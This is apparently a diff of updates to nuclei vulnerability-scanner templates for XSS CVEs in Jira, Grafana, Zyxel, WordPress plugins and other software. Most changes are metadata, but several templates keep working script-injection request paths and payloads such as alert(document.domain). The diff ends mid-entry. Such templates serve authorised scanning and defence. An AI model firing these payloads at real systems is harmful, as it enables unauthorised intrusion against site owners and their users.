    11 11   - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf
    12  - - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
    13 12   - https://wpvulndb.com/vulnerabilities/9893
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16931
    14 14   classification:
    15 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    16 16   cvss-score: 6.1
    skipped 28 lines
    45 45   status:
    46 46   - 200
    47 47   
     48 +# Enhanced by mp on 2022/08/31
     49 + 
  • ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-17382.yaml
    skipped 6 lines
    7 7   description: Zabbix through 4.4 is susceptible to an authentication bypass vulnerability via zabbix.php?action=dashboard.view&dashboardid=1. An attacker can bypass the login page and access the dashboard page, and then create a Dashboard, Report, Screen, or Map without any Username/Password (i.e., anonymously). All created elements (Dashboard/Report/Screen/Map) are accessible by other users and by an admin.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/47467
    10  - - https://www.cvedetails.com/cve/CVE-2019-17382/
     10 + - https://nvd.nist.gov/vuln/detail/CVE-2019-17382
    11 11   classification:
    12 12   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    13 13   cvss-score: 9.1
    skipped 28 lines
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-18665.yaml
    skipped 8 lines
    9 9   reference:
    10 10   - https://atomic111.github.io/article/secudos-domos-directory_traversal
    11 11   - https://vuldb.com/?id.144804
    12  - - https://www.cvedetails.com/cve/CVE-2019-18665
    13 12   - https://www.secudos.de/news-und-events/aktuelle-news/domos-release-5-6
    14 13   - https://nvd.nist.gov/vuln/detail/CVE-2019-18665
    15 14   classification:
    skipped 24 lines
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-19134.yaml
    1 1  id: CVE-2019-19134
    2 2   
    3 3  info:
    4  - name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS)
     4 + name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
     7 + description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
    8 8   reference:
    9 9   - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
    10 10   - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
    11 11   - https://heroplugins.com/product/maps/
    12 12   - https://heroplugins.com/changelogs/hmaps/changelog.txt
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2019-19134
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 16   cvss-score: 6.1
    skipped 22 lines
    38 39   status:
    39 40   - 200
    40 41   
     42 +# Enhanced by mp on 2022/08/31
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-19368.yaml
    1 1  id: CVE-2019-19368
    2 2   
    3 3  info:
    4  - name: Rumpus FTP Web File Manager 8.2.9.1 XSS
     4 + name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
    5 5   author: madrobot
    6 6   severity: medium
    7  - description: A Reflected Cross Site Scripting was discovered in the Login page of Rumpus FTP Web File Manager 8.2.9.1. An attacker can exploit it by sending a crafted link to end users and can execute arbitrary Javascripts
     7 + description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
    8 8   reference:
    9 9   - https://github.com/harshit-shukla/CVE-2019-19368/
    10 10   - https://www.maxum.com/Rumpus/Download.html
    11 11   - http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2019-19368
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 15 lines
    30 31   - "value=''><sVg/OnLoAD=alert`1337`//'>"
    31 32   part: body
    32 33   
     34 +# Enhanced by mp on 2022/08/31
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-19908.yaml
    1 1  id: CVE-2019-19908
    2 2   
    3 3  info:
    4  - name: phpMyChat-Plus - Cross-Site Scripting
     4 + name: phpMyChat-Plus 1.98 - Cross-Site Scripting
    5 5   author: madrobot
    6 6   severity: medium
    7  - description: phpMyChat-Plus 1.98 is vulnerable to reflected cross-site scripting (XSS) via JavaScript injection into the password reset URL. In the URL, the pmc_username parameter to pass_reset.php is vulnerable.
     7 + description: phpMyChat-Plus 1.98 contains a cross-site scripting vulnerability via pmc_username parameter of pass_reset.php in password reset URL.
    8 8   reference:
    9 9   - https://cinzinga.github.io/CVE-2019-19908/
    10 10   - http://ciprianmp.com/
    11 11   - https://sourceforge.net/projects/phpmychat/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2019-19908
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 15 lines
    30 31   - "<script>alert(1337)</script>"
    31 32   part: body
    32 33   
     34 +# Enhanced by mp on 2022/08/31
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-20141.yaml
    1 1  id: CVE-2019-20141
    2 2   
    3 3  info:
    4  - name: Neon Dashboard - Cross-Site Scripting
     4 + name: WordPress Laborator Neon Theme 2.0 - Cross-Site Scripting
    5 5   author: knassar702
    6 6   severity: medium
    7  - description: An XSS issue was discovered in the Laborator Neon theme 2.0 for WordPress via the data/autosuggest-remote.php q parameter.
     7 + description: WordPress Laborator Neon theme 2.0 contains a cross-site scripting vulnerability via the data/autosuggest-remote.php q parameter.
    8 8   reference:
    9 9   - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-cve-2019-20141.html
    10 10   - https://knassar7o2.blogspot.com/2019/12/neon-dashboard-xss-reflected.html
    11 11   - https://knassar702.github.io/cve/neon/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2019-20141
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    skipped 19 lines
    34 35   - "text/html"
    35 36   part: header
    36 37   
     38 +# Enhanced by mp on 2022/08/31
     39 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-20210.yaml
    1 1  id: CVE-2019-20210
    2 2   
    3 3  info:
    4  - name: CTHthemes CityBook < 2.3.4 - Reflected XSS
     4 + name: WordPress CTHthemes - Cross-Site Scripting
    5 5   author: edoardottt
    6 6   severity: medium
    7 7   description: |
    8  - The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query.
     8 + WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
    9 9   reference:
    10 10   - https://wpscan.com/vulnerability/10013
    11  - - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
    12 11   - https://wpvulndb.com/vulnerabilities/10018
    13 12   - https://cxsecurity.com/issue/WLB-2019120112
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2019-20210
    14 14   classification:
    15 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    16 16   cvss-score: 6.1
    skipped 24 lines
    41 41   status:
    42 42   - 200
    43 43   
     44 +# Enhanced by mp on 2022/08/31
     45 + 
  • config/nuclei-templates/cves/2019/CVE-2019-20933.yaml
    Content is identical
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-3402.yaml
    1 1  id: CVE-2019-3402
    2 2   
    3 3  info:
    4  - name: Jira - Reflected XSS using searchOwnerUserName parameter.
     4 + name: Jira <8.1.1 - Cross-Site Scripting
    5 5   author: pdteam
    6 6   severity: medium
    7  - description: The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability in the searchOwnerUserName parameter.
     7 + description: Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
    8 8   reference:
    9 9   - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
    10 10   - https://jira.atlassian.com/browse/JRASERVER-69243
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2019-3402
    11 12   classification:
    12 13   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    13 14   cvss-score: 6.1
    skipped 17 lines
    31 32   words:
    32 33   - "<script>alert(1)</script>"
    33 34   part: body
     35 + 
     36 +# Enhanced by mp on 2022/08/31
     37 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-3911.yaml
    1 1  id: CVE-2019-3911
    2  - 
    3 2  info:
    4  - name: LabKey Server < 18.3.0 - XSS
     3 + name: LabKey Server Community Edition <18.3.0 - Cross-Site Scripting
    5 4   author: princechaddha
    6 5   severity: medium
    7  - description: Reflected cross-site scripting (XSS) vulnerability in LabKey Server Community Edition before 18.3.0-61806.763 allows an unauthenticated remote attacker to inject arbitrary javascript via the onerror
    8  - parameter in the /__r2/query endpoints.
     6 + description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
    9 7   reference:
    10 8   - https://www.tenable.com/security/research/tra-2019-03
    11  - - https://www.cvedetails.com/cve/CVE-2019-3911
     9 + - https://nvd.nist.gov/vuln/detail/CVE-2019-3911
    12 10   classification:
    13 11   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 12   cvss-score: 6.1
    skipped 2 lines
    17 15   metadata:
    18 16   shodan-query: 'Server: Labkey'
    19 17   tags: cve,cve2019,xss,labkey,tenable
    20  - 
    21 18  requests:
    22 19   - method: GET
    23 20   path:
    24 21   - '{{BaseURL}}/__r2/query-printRows.view?schemaName=ListManager&query.queryName=ListManager&query.sort=Nameelk5q%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3Ezp59r&query.containerFilterName=CurrentAndSubfolders&query.selectionKey=%24ListManager%24ListManager%24%24query&query.showRows=ALL'
    25  - 
    26 22   matchers-condition: and
    27 23   matchers:
    28 24   - type: word
    29 25   part: body
    30 26   words:
    31 27   - "</script><script>alert(document.domain)</script>"
    32  - 
    33 28   - type: word
    34 29   part: header
    35 30   words:
    36 31   - text/html
    37  - 
    38 32   - type: status
    39 33   status:
    40 34   - 200
    41 35   
     36 +# Enhanced by cs on 2022/09/07
     37 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-7219.yaml
    1 1  id: CVE-2019-7219
    2  - 
    3 2  info:
    4  - name: Zarafa WebApp Reflected XSS
     3 + name: Zarafa WebApp <=2.0.1.47791 - Cross-Site Scripting
    5 4   author: pdteam
    6 5   severity: medium
    7 6   description: |
    8  - Unauthenticated reflected cross-site scripting (XSS) exists in Zarafa Webapp 2.0.1.47791 and earlier. NOTE: this is a discontinued product. The issue was fixed in later Zarafa Webapp versions; however, some former Zarafa Webapp customers use the related Kopano product instead.
     7 + Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
    9 8   reference:
    10 9   - https://github.com/verifysecurity/CVE-2019-7219
    11 10   - https://stash.kopano.io/repos?visibility=public
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2019-7219
     12 + remediation: This is a discontinued product. The issue was fixed in later versions. However, some former Zarafa WebApp customers use the related Kopano product instead.
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    15 16   cve-id: CVE-2019-7219
    16 17   cwe-id: CWE-79
    17 18   tags: cve,cve2019,zarafa,xss
    18  - 
    19 19  requests:
    20 20   - method: GET
    21 21   path:
    22 22   - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(/xss/)%3E'
    23  - 
    24 23   matchers-condition: and
    25 24   matchers:
    26 25   - type: word
    skipped 4 lines
    31 30   part: header
    32 31   words:
    33 32   - "text/html"
    34  - 
    35 33   - type: status
    36 34   status:
    37 35   - 200
    38 36   
     37 +# Enhanced by cs on 2022/09/07
     38 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-7543.yaml
    1 1  id: CVE-2019-7543
    2 2   
    3 3  info:
    4  - name: KindEditor 4.1.11, the php/demo.php - (XSS)
     4 + name: KindEditor 4.1.11 - Cross-Site Scripting
    5 5   author: pikpikcu
    6 6   severity: medium
    7  - description: KindEditor 4.1.11, the php/demo.php content1 parameter has a reflected Cross-site Scripting (XSS) vulnerability.
     7 + description: KindEditor 4.1.11 contains a cross-site scripting vulnerability via the php/demo.php content1 parameter.
    8 8   reference:
    9 9   - https://github.com/0xUhaw/CVE-Bins/tree/master/KindEditor
    10 10   - https://nvd.nist.gov/vuln/detail/CVE-2019-7543
    skipped 26 lines
    37 37   words:
    38 38   - text/html
    39 39   
     40 +# Enhanced by mp on 2022/08/31
     41 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-8937.yaml
    1 1  id: CVE-2019-8937
    2 2   
    3 3  info:
    4  - name: HotelDruid 2.3.0 - XSS
     4 + name: HotelDruid 2.3.0 - Cross-Site Scripting
    5 5   author: LogicalHunter
    6 6   severity: medium
    7  - description: HotelDruid 2.3.0 has XSS affecting the nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
     7 + description: HotelDruid 2.3.0 contains a cross-site scripting vulnerability affecting nsextt, cambia1, mese_fine, origine, and anno parameters in creaprezzi.php, tabella3.php, personalizza.php, and visualizza_tabelle.php.
    8 8   reference:
    9 9   - https://www.exploit-db.com/exploits/46429
    10  - - https://www.exploit-db.com/exploits/46429/
    11 10   - https://sourceforge.net/projects/hoteldruid/
    12 11   - http://packetstormsecurity.com/files/151779/HotelDruid-2.3-Cross-Site-Scripting.html
    13  - metadata:
    14  - verified: true
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2019-8937
    15 13   classification:
    16 14   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    17 15   cvss-score: 6.1
    18 16   cve-id: CVE-2019-8937
    19 17   cwe-id: CWE-79
     18 + metadata:
     19 + verified: "true"
    20 20   tags: packetstorm,cve,cve2019,xss,hoteldruid,edb
    21 21   
    22 22  requests:
    skipped 22 lines
    45 45   status:
    46 46   - 200
    47 47   
     48 +# Enhanced by mp on 2022/08/31
     49 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-9955.yaml
    1 1  id: CVE-2019-9955
    2 2   
    3 3  info:
    4  - name: Zyxel - Reflected Cross-site Scripting
     4 + name: Zyxel - Cross-Site Scripting
    5 5   author: pdteam
    6 6   severity: medium
    7  - description: On Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, ZyWALL 1100 devices, the security
    8  - firewall login page is vulnerable to Reflected XSS via the unsanitized 'mp_idx' parameter.
     7 + description: Zyxel ATP200, ATP500, ATP800, USG20-VPN, USG20W-VPN, USG40, USG40W, USG60, USG60W, USG110, USG210, USG310, USG1100, USG1900, USG2200-VPN, ZyWALL 110, ZyWALL 310, and ZyWALL 1100 devices contain a reflected cross-site scripting vulnerability on the security firewall login page via the mp_idx parameter.
    9 8   reference:
    10 9   - http://packetstormsecurity.com/files/152525/Zyxel-ZyWall-Cross-Site-Scripting.html
    11  - - http://seclists.org/fulldisclosure/2019/Apr/22
    12 10   - https://www.exploit-db.com/exploits/46706/
    13 11   - https://www.securitymetrics.com/blog/Zyxel-Devices-Vulnerable-Cross-Site-Scripting-Login-page
    14 12   - https://www.zyxel.com/support/reflected-cross-site-scripting-vulnerability-of-firewalls.shtml
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9955
    15 14   classification:
    16 15   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    17 16   cvss-score: 6.1
    skipped 14 lines
    32 31   - "<title>Welcome</title>"
    33 32   condition: and
    34 33   
     34 +# Enhanced by mp on 2022/08/31
     35 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2019/CVE-2019-9978.yaml
    1 1  id: CVE-2019-9978
    2 2   
    3 3  info:
    4  - name: WordPress social-warfare RFI
     4 + name: WordPress Social Warfare <3.5.3 - Cross-Site Scripting
    5 5   author: madrobot,dwisiswant0
    6 6   severity: medium
    7  - description: The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.
     7 + description: WordPress Social Warfare plugin before 3.5.3 contains a cross-site scripting vulnerability via the wp-admin/admin-post.php?swp_debug=load_options swp_url parameter, affecting Social Warfare and Social Warfare Pro.
    8 8   reference:
    9 9   - https://github.com/mpgn/CVE-2019-9978
    10 10   - https://www.wordfence.com/blog/2019/03/unpatched-zero-day-vulnerability-in-social-warfare-plugin-exploited-in-the-wild/
    11 11   - https://www.pluginvulnerabilities.com/2019/03/21/full-disclosure-of-settings-change-persistent-cross-site-scripting-xss-vulnerability-in-social-warfare/
    12 12   - https://www.cybersecurity-help.cz/vdb/SB2019032105
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2019-9978
    13 14   classification:
    14 15   cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 16   cvss-score: 6.1
    skipped 17 lines
    33 34   words:
    34 35   - "http"
    35 36   
     37 +# Enhanced by mp on 2022/08/31
     38 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-11110.yaml
    1 1  id: CVE-2020-11110
    2 2   
    3 3  info:
    4  - name: Grafana Unauthenticated Stored XSS
     4 + name: Grafana <=6.7.1 - Cross-Site Scripting
    5 5   author: emadshanab
    6 6   severity: medium
    7  - description: Grafana through 6.7.1 allows stored XSS due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
     7 + description: Grafana through 6.7.1 contains an unauthenticated stored cross-site scripting vulnerability due to insufficient input protection in the originalUrl field, which allows an attacker to inject JavaScript code that will be executed after clicking on Open Original Dashboard after visiting the snapshot.
    8 8   reference:
    9 9   - https://web.archive.org/web/20210717142945/https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
    10  - - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
    11 10   - https://github.com/grafana/grafana/blob/master/CHANGELOG.md
    12 11   - https://security.netapp.com/advisory/ntap-20200810-0002/
     12 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11110
    13 13   remediation: This issue can be resolved by updating Grafana to the latest version.
    14 14   classification:
    15 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    skipped 42 lines
    58 58   regex:
    59 59   - '"url":"([a-z:/0-9A-Z]+)"'
    60 60   
     61 +# Enhanced by mp on 2022/09/02
     62 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-11930.yaml
    1 1  id: CVE-2020-11930
    2 2   
    3 3  info:
    4  - name: WordPress Plugin "Translate WordPress with GTranslate" (gtranslate) XSS
     4 + name: WordPress GTranslate <2.8.52 - Cross-Site Scripting
    5 5   author: dhiyaneshDK
    6 6   severity: medium
    7 7   description: |
    8  - The GTranslate plugin before 2.8.52 for WordPress was vulnerable to an Unauthenticated Reflected XSS vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
     8 + WordPress GTranslate plugin before 2.8.52 contains an unauthenticated reflected cross-site scripting vulnerability via a crafted link. This requires use of the hreflang tags feature within a sub-domain or sub-directory paid option.
    9 9   reference:
    10 10   - https://wpscan.com/vulnerability/10181
    11 11   - https://payatu.com/blog/gaurav/analysis-of-cve-2020-11930:-reflected-xss-in-gtranslate-wordpress-module
    12 12   - https://plugins.trac.wordpress.org/changeset/2245581/gtranslate
    13 13   - https://plugins.trac.wordpress.org/changeset/2245591/gtranslate
     14 + - https://nvd.nist.gov/vuln/detail/CVE-2020-11930
    14 15   classification:
    15 16   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    16 17   cvss-score: 6.1
    skipped 20 lines
    37 38   status:
    38 39   - 200
    39 40   
     41 +# Enhanced by mp on 2022/09/02
     42 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-12054.yaml
    1 1  id: CVE-2020-12054
    2 2   
    3 3  info:
    4  - name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS
     4 + name: WordPress Catch Breadcrumb <1.5.4 - Cross-Site Scripting
    5 5   author: daffainfo
    6 6   severity: medium
    7  - description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query).
     7 + description: |
     8 + WordPress Catch Breadcrumb plugin before 1.5.4 contains a reflected cross-site scripting vulnerability via the s parameter (a search query). Also affected are 16 themes if the plugin is enabled: Alchemist and Alchemist PRO, Izabel and Izabel PRO, Chique and Chique PRO, Clean Enterprise and Clean Enterprise PRO, Bold Photography PRO, Intuitive PRO, Devotepress PRO, Clean Blocks PRO, Foodoholic PRO, Catch Mag PRO, Catch Wedding PRO, and Higher Education PRO.
    8 9   reference:
    9 10   - https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4
    10 11   - https://wpvulndb.com/vulnerabilities/10184
    11 12   - https://cxsecurity.com/issue/WLB-2020040144
     13 + - https://nvd.nist.gov/vuln/detail/CVE-2020-12054
    12 14   classification:
    13 15   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 16   cvss-score: 6.1
    skipped 23 lines
    38 40   - type: status
    39 41   status:
    40 42   - 200
     43 + 
     44 +# Enhanced by mp on 2022/09/02
     45 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-13258.yaml
     1 +id: CVE-2020-13258
     2 + 
     3 +info:
     4 + name: Contentful - Reflected XSS
     5 + author: pikpikcu
     6 + severity: medium
     7 + description: |
     8 + Contentful through 2020-05-21 for Python allows reflected XSS, as demonstrated by the api parameter to the-example-app.py.
     9 + reference:
     10 + - https://github.com/contentful/the-example-app.py/issues/44
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2016-1000140
     12 + classification:
     13 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     14 + cvss-score: 6.1
     15 + cve-id: CVE-2020-13258
     16 + cwe-id: CWE-79
     17 + tags: cve,cve2020,contentful,xss
     18 + 
     19 +requests:
     20 + - raw:
     21 + - |
     22 + GET /?cda'"</script><script>alert(document.domain)</script>&locale=locale=de-DE HTTP/1.1 HTTP/1.1
     23 + Host: {{Hostname}}
     24 + 
     25 + matchers-condition: and
     26 + matchers:
     27 + - type: word
     28 + words:
     29 + - "{'api': '"
     30 + - "</script><script>alert(document.domain)</script>',"
     31 + condition: and
     32 + 
     33 + - type: word
     34 + part: header
     35 + words:
     36 + - text/html
     37 + 
     38 + - type: status
     39 + status:
     40 + - 200
     41 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-14408.yaml
    1 1  id: CVE-2020-14408
    2 2   
    3 3  info:
    4  - name: Agentejo Cockpit 0.10.2 - Reflected XSS
     4 + name: Agentejo Cockpit 0.10.2 - Cross-Site Scripting
    5 5   author: edoardottt
    6 6   severity: medium
    7  - description: An issue was discovered in Agentejo Cockpit 0.10.2. Insufficient sanitization of the to parameter in the /auth/login route allows for injection of arbitrary JavaScript code into a web page's content, creating a Reflected XSS attack vector.
     7 + description: Agentejo Cockpit 0.10.2 contains a reflected cross-site scripting vulnerability due to insufficient sanitization of the to parameter in the /auth/login route, which allows for injection of arbitrary JavaScript code into a web page's content.
    8 8   classification:
    9 9   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    10 10   cvss-score: 6.1
    skipped 2 lines
    13 13   reference:
    14 14   - https://github.com/agentejo/cockpit/issues/1310
    15 15   - https://nvd.nist.gov/vuln/detail/CVE-2020-14408
    16  - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14408
    17 16   metadata:
    18 17   verified: true
    19 18   tags: cve,cve2022,cockpit,agentejo,xss,oss
    skipped 20 lines
    40 39   status:
    41 40   - 200
    42 41   
     42 +# Enhanced by mp on 2022/09/02
     43 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-5191.yaml
    1 1  id: CVE-2020-5191
    2 2   
    3 3  info:
    4  - name: Hospital Management System 4.0 - Cross-Site Scripting
     4 + name: PHPGurukul Hospital Management System - Cross-Site Scripting
    5 5   author: TenBird
    6 6   severity: medium
    7 7   description: |
    8  - PHPGurukul Hospital Management System in PHP v4.0 suffers from multiple Persistent XSS vulnerabilities.
     8 + PHPGurukul Hospital Management System in PHP 4.0 contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.
    9 9   reference:
    10 10   - https://www.exploit-db.com/exploits/47841
     11 + - https://phpgurukul.com/hospital-management-system-in-php/
    11 12   - https://nvd.nist.gov/vuln/detail/CVE-2020-5191
    12  - - https://phpgurukul.com/hospital-management-system-in-php/
    13 13   classification:
    14 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    15 15   cvss-score: 6.1
    skipped 38 lines
    54 54   status:
    55 55   - 200
    56 56   
     57 +# Enhanced by mp on 2022/09/02
     58 + 
  • ■ ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-8115.yaml
    1 1  id: CVE-2020-8115
    2  - 
    3 2  info:
    4  - name: Revive Adserver XSS
     3 + name: Revive Adserver <=5.0.3 - Cross-Site Scripting
    5 4   author: madrobot,dwisiswant0
    6 5   severity: medium
    7 6   description: |
    8  - A reflected XSS vulnerability has been discovered in the publicly accessible afr.php delivery script of Revive Adserver <= 5.0.3 by Jacopo Tediosi. There are currently no known exploits: the session identifier cannot be accessed as it is stored in an http-only cookie as of v3.2.2. On older versions, however, under specific circumstances, it could be possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script was printed back without proper escaping in a JavaScript context, allowing an attacker to execute arbitrary JS code on the browser of the victim.
     7 + Revive Adserver 5.0.3 and prior contains a reflected cross-site scripting vulnerability in the publicly accessible afr.php delivery script. In older versions, it is possible to steal the session identifier and gain access to the admin interface. The query string sent to the www/delivery/afr.php script is printed back without proper escaping, allowing an attacker to execute arbitrary JavaScript code on the browser of the victim.
    9 8   reference:
    10 9   - https://hackerone.com/reports/775693
    11 10   - https://www.revive-adserver.com/security/revive-sa-2020-001/
     11 + - https://nvd.nist.gov/vuln/detail/CVE-2020-8115
     12 + remediation: There are currently no known exploits. As of 3.2.2, the session identifier cannot be accessed as it is stored in an http-only cookie.
    12 13   classification:
    13 14   cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    14 15   cvss-score: 6.1
    15 16   cve-id: CVE-2020-8115
    16 17   cwe-id: CWE-79
    17 18   tags: cve,cve2020,xss,hackerone
    18  - 
    19 19  requests:
    20 20   - method: GET
    21 21   path:
    skipped 7 lines
    29 29   part: body
    30 30   regex:
    31 31   - (?mi)window\.location\.replace\(".*alert\(1337\)
     32 + 
     33 +# Enhanced by cs on 2022/09/07
     34 + 
  • ■ ■ ■ ■ ■
    config/nuclei-templates/cves/2020/CVE-2020-8191.yaml
    1 1  id: CVE-2020-8191
    2 2   
    3 3  info:
    4  - name: Citrix ADC & NetScaler Gateway Reflected XSS
     4 + name: Citrix ADC/Gateway - Cross-Site Scripting
    5 5   author: dwisiswant0
    6 6   severity: medium
    7 7   description: |
    8  - Improper input validation in Citrix ADC and Citrix Gateway versions before 13.0-58.30, 12.1-57.18, 12.0-63.21, 11.1-64.14 and 10.5-70.18 and Citrix SDWAN WAN-OP versions before 11.1.1a, 11.0.3d and 10.2.7 allows reflected Cross Site Scripting (XSS).
